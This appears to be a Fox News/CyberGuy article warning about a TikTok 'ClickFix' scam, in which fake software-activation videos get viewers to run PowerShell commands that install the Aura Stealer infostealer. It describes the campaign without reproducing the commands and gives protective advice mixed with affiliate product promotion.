NEWYou can now listen to Fox News articles!
Cybercriminals are once again turning TikTok into a trap for unsuspecting users. This time, they disguise malicious downloads as free activation guides for popular software like Windows, Microsoft 365, Photoshop, and even fake versions of Netflix and Spotify Premium.
Security expert Xavier Mertens was the first to spot the campaign, confirming that the same type of scheme was seen earlier this year. According to BleepingComputer, these fake TikTok videos display short PowerShell commands and ask viewers to run them as administrators to “enable” or “fix” their programs.
In reality, these commands connect to a malicious website and attract malware known as Aura Stealer, which silently siphons passwords, cookies, cryptocurrency wallets, and authentication tokens saved on the victim’s computer.
Sign up for my FREE CyberGuy Report
Get my best tech tips, urgent security alerts and exclusive offers straight to your inbox. Plus, you’ll get instant access to my Ultimate Scam Survival Guide — free when you join my CYBERGUY.COM bulletin.
MORE THAN 3,000 YOUTUBE VIDEOS DELIVERY DISGUSTED MALWARE AS FREE SOFTWARE
Cybercriminals are using fake TikTok videos to trick users into downloading malware disguised as free activation guides. (Kurt “CyberGuy” Knutsson)
How the TikTok Scam Works
This campaign uses what experts call a ClickFix attack. This is a social engineering trick that makes victims appear to be following legitimate technical instructions. The instructions seem simple and quick: run a short command and get instant access to the premium software.
But instead of activating anything, the PowerShell command connects to a remote domain named slmgr[.]win, which downloads harmful executables from Cloudflare-hosted pages. The main file, updater.exe, is a variant of the Aura Stealer malware. Once inside the system, it searches for your credentials and returns them to the attacker.
Another file, source.exe, uses Microsoft’s C# compiler to run code directly in memory, making it even harder to detect. The purpose of this additional payload is not yet fully known, but the pattern follows previous malware used for crypto theft and ransomware distribution.
Meta account suspension scam hides FILEFIX malware
These short “activation” commands covertly connect to malicious servers that install information-stealing malware like Aura Stealer. (Kurt “CyberGuy” Knutsson)
How to protect yourself from TikTok malware scams
Even though these scams seem convincing, you can avoid becoming a victim by taking proper precautions.
1) Avoid shortcuts
Never copy or run PowerShell commands from TikTok videos or random websites. If something promises free access to premium software, it’s probably a trap.
2) Use trusted sources
Always download or activate the software directly from the official website or through legitimate app stores.
3) Keep security tools up to date
Outdated antiviruses or browsers cannot detect the latest threats. Update your software regularly to stay protected.
4) Use powerful antivirus software
Install powerful antivirus software that offers real-time scanning and protection against Trojans, information thieves and phishing attempts.
The best way to protect yourself from malicious links that install malware, potentially accessing your private information, is to install powerful antivirus software on all your devices. This protection can also alert you to phishing emails and ransomware scams, protecting your personal information and digital assets.
Get my picks for the best 2025 antivirus protection winners for your Windows, Mac, Android, and iOS devices at Cyberguy.com
5) Sign up for a data deletion service
If your personal data ends up on the dark web, a data removal or monitoring service can alert you and help you remove sensitive information.
Although no service can guarantee the complete removal of your data from the Internet, a data deletion service is definitely a wise choice. They’re not cheap, and neither is your privacy. These services do all the work for you by actively monitoring and systematically deleting your personal information across hundreds of websites. This is what gives me peace of mind and has proven to be the most effective way to erase your personal data from the Internet. By limiting the information available, you reduce the risk of fraudsters cross-referencing data from breaches with information they might find on the dark web, making it harder for them to target you.
Check out my top picks for data deletion services and get a free scan to find out if your personal information is already available on the web by visiting Cyberguy.com
Get a free analysis to find out if your personal information is already available on the web: Cyberguy.com
6) Reset credentials
If you’ve ever followed suspicious instructions or entered credentials after watching a “free activation” video, reset all your passwords immediately.
7) Reset passwords
If you’ve ever followed suspicious instructions or entered credentials after watching a “free activation” video, reset all your passwords immediately. Start with your email, financial, and social media accounts. Use unique passwords for each site. Consider using a password manager, which securely stores and generates complex passwords, reducing the risk of password reuse.
Next, check to see if your email has been exposed in past breaches. Our #1 password manager (see Cyberguy.com) Pick includes a built-in breach scanner that checks if your email address or passwords have appeared in known leaks. If you discover a match, immediately change any reused passwords and secure those accounts with new, unique credentials.
Discover the Best Expert-Rated Password Managers of 2025 at Cyberguy.com
8) Enable multi-factor authentication
Add an extra layer of security by enabling multi-factor authentication wherever possible. Even if your passwords are stolen, attackers will not be able to log in without your verification.
If you followed suspicious steps, change your passwords, enable two-factor authentication, and stay alert for future scams. (Getty Images)
Kurt’s Key Takeaways
TikTok’s global reach makes it a prime target for scams like this. What looks like a useful hack could end up costing your security, money, and peace of mind. Stay vigilant, trust only verified sources and remember that there is no free activation shortcut.
CLICK HERE TO DOWNLOAD THE FOX NEWS APP
Is TikTok doing enough to protect its users from scams like this? Let us know by writing to us at Cyberguy.com
Sign up for my FREE CyberGuy Report
Get my best tech tips, urgent security alerts and exclusive offers straight to your inbox. Plus, you’ll get instant access to my Ultimate Scam Survival Guide — free when you join my CYBERGUY.COM bulletin.
Copyright 2025 CyberGuy.com. All rights reserved.
